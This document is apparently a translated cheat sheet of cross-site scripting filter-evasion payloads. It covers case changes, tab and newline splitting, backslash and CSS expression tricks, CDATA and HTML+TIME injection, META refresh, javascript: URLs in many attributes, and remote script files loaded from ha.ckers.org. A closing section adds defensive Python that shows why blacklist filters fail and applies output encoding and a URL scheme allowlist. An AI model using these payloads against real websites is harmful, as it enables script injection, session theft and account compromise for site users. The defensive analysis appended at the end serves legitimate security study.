1. Vary the letter case

<sCript>alert('d')</scRipT>

2. Add extra characters to slip past regular-expression checks

<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" '' SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use a different file extension instead of .js

<script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}
5. Insert other characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use tab or newline characters to evade (the breaks inside "javascript" below stand for a tab or a newline character)

<img src="jav ascr ipt:alert('XSS3')">
<img src="jav ascr ipt:alert('XSS3')">
<IMG SRC="jav ascript:alert('XSS');">
-> tab
-> new line
7. Use the backslash "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Original source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Original source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script in HTML tag event handlers

<body onload="alert('onload')">

Event handler attributes that can carry script:
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code embedded in an SWF file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart and reassemble it

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie through a META tag

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. JavaScript in src, href and url()

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
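As an added defensive example (not part of the original post), the Python below shows why the blacklist-style regex filters that the vectors above are built to slip past are the wrong tool, and what works instead: contextual output encoding for text, and a scheme allowlist for URL attributes, applied only after entity-decoding and stripping the control characters that browsers ignore (the tab/newline trick of section 6 and the entity trick of section 8). The sample inputs are constructed from the vectors on this page; the function and constant names are my own.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed inputs, taken from the vectors listed in sections 1, 5, 6, 8 and 14.
SAMPLES = {
    "mixed_case": '<sCript>alert("d")</scRipT>',
    "slash_in_tag": '<SCRIPT/SRC="t.js"></SCRIPT>',
    "tab_newline": 'jav\tascr\nipt:alert("XSS3")',
    "entity": '&#106;avascript:alert("XSS")',
    "benign": 'https://example.com/page?q=1',
    "relative": '/images/logo.png',
}

# The kind of blacklist these vectors are built to slip past: it only knows the
# literal tag name, so "<SCRIPT/SRC=" or an onload= handler never matches.
NAIVE_BLACKLIST = re.compile(r"<script>", re.IGNORECASE)

def naive_filter_blocks(value: str) -> bool:
    return bool(NAIVE_BLACKLIST.search(value))

def render_text(value: str) -> str:
    """Element-body or attribute-text context: encode instead of filtering.
    After escaping, '<' cannot open a tag and quotes cannot close an attribute."""
    return html.escape(value, quote=True)

# Browsers drop tab, CR and LF anywhere in a URL and leading/trailing control
# characters, which is why 'jav<TAB>ascript:' still executes.  We strip every
# ASCII control character and the space (stricter than the browser, which is
# fine for an allowlist) so the scheme check sees what the browser will see.
_CONTROL = re.compile(r"[\x00-\x20\x7f]")
SAFE_SCHEMES = {"http", "https", "mailto"}

def is_safe_url(value: str) -> bool:
    """URL attribute context (src, href, CSS url()): allowlist the scheme.
    Entity-decode first, because the HTML parser does that before the URL is read."""
    decoded = html.unescape(value)
    normalized = _CONTROL.sub("", decoded)
    scheme = urlsplit(normalized).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES   # no scheme means a relative URL

if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:12} blacklist={naive_filter_blocks(sample)!s:5} "
              f"safe_url={is_safe_url(sample)!s:5} escaped={render_text(sample)}")
```

Note that is_safe_url only decides whether a value may be placed in a URL attribute at all; the value still has to be attribute-encoded when it is written into the markup.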